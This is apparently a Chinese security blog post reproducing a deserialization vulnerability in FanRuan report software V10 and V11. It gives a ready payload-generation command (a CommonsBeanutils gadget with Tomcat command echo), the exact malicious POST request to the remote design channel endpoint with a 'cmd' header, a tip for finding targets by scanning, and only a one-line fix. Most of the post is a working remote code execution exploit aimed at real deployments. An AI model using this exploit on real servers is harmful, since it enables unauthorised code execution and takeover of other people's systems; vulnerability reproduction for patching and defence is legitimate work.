帆软报表软件反序列化漏洞复现

漏洞说明:

帆软 V10 及 V11 版本报表软件存在反序列化漏洞,攻击者可利用该漏洞使用POST 方法向帆软报表软件路径/webroot/decision/remote/design/channel 发送恶意数据包,将二进制数据流或文件加载到服务器内存中触发反序列化操作,从而实现任意代码执行,获取服务器控制权限。

复现:

比较早的一个洞,实战中还是能遇到的。

长这个样子:

图片

建议在字典中增加/webroot/decision/login路径,一般工具扫不出来该路径

漏洞文档POC:

java -jar ysuserial-1.5-su18-all.jar -g CommonsBeanutils1183NOCC -p 'EX-TomcatEcho' -ch "cmd" > fine10.bin

POST /webroot/decision/remote/design/channel HTTP/1.1
Content-Type: application/json
Host:
cmd: id
Connection: close

{{gzip(file(fine10.bin))}}

脚本复现命令执行:


python fr.py

图片

有回显可以打,没有就不能打

修复方法:

在服务器端禁用以下目录的访问: ① /webroot/decision/remote/design/channel ② /webroot/ReportServer/

© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片快捷回复

    暂无评论内容